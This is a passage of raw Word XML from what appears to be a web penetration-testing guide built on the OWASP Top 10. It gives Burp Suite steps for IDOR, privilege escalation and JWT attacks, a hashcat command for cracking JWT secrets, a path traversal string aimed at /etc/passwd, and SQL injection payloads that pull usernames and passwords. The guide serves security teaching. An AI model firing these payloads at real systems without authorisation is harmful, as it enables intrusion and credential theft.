        <w:t xml:space="preserve">IDOR (Insecure Direct Object Reference) — access another user's resource by changing an ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation — horizontal (same role, different user) or vertical (low → admin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forced Browsing — accessing /admin, /config, /backup without authorisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal — ../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Function-Level Access Control — API endpoints not enforcing auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Burp Testing Methodology — IDOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in as User A, browse to profile: GET /api/users/1001/profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send to Repeater, change 1001 to 1002 (User B's ID)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If User B's data returned — IDOR confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Autorize extension: log in as User B in browser, Autorize intercepts User A's requests and replays them with User B's token automatically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Autorize colour coding: RED = access control broken, GREEN = properly enforced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Burp Testing Methodology — Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Capture admin action as admin user:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  POST /admin/users/delete  Cookie: admin_session=ABC123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Replay with low-privilege token in Repeater:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  POST /admin/users/delete  Cookie: user_session=XYZ789</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # 200 OK + action executed = Vertical Privilege Escalation</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CWE-284 (Improper Access Control), CWE-639 (IDOR), CWE-862 (Missing Authorization)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-11043 (PHP-FPM path traversal to RCE), CVE-2020-9484 (Apache Tomcat deserialization via file access)</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A02:2021 — Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Formerly 'Sensitive Data Exposure'. Failures in cryptography lead to exposure of passwords, credit cards, health data, and session tokens. The focus is both on the absence of encryption and weak/outdated cryptographic implementations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Sub-Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data transmitted in cleartext (HTTP instead of HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak ciphers: MD5/SHA1 for password hashing, RC4, DES, ECB mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardcoded secrets in source code / JavaScript files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak/predictable session tokens (test with Sequencer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT algorithm confusion — alg:none, RS256→HS256 key confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Burp Testing Methodology — JWT Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Install JWT Editor extension from BApp Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept any request containing Authorization: Bearer &lt;token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In JSON Web Tokens tab: decode header/payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test 1 — Algorithm None: change alg to 'none', remove signature, send</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test 2 — Weak secret brute force: use hashcat -a 0 -m 16500 token.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test 3 — RS256→HS256: obtain public key, sign with HS256 using public key as secret</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CWE-326 (Inadequate Encryption Strength), CWE-798 (Hardcoded Credentials), CWE-916 (Weak Password Hash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2018-0114 (Cisco JWT alg:none), CVE-2022-21449 (Java ECDSA signature bypass 'Psychic Signatures')</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A03:2021 — Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. SQL, OS command, LDAP, XPath, and NoSQL injections all fall under this category.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ SQL Injection — Complete Burp Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00D4AA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Phase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # In Repeater, append to any parameter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  '  (single quote — triggers syntax error)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  ' OR '1'='1  (boolean true — may return all records)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  ' AND SLEEP(5)--  (time-based — 5 second delay = vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  '; SELECT SLEEP(5)--  (stacked queries)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00D4AA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation — Union-Based</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Step 1: Determine number of columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  ' ORDER BY 1--   ' ORDER BY 2--   ' ORDER BY 3-- (increment until error)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Step 2: Find visible column position</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  ' UNION SELECT null,null,'test'--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Step 3: Extract data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  ' UNION SELECT null,username,password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00D4AA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Burp Scanner + SQLiPy Extension</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
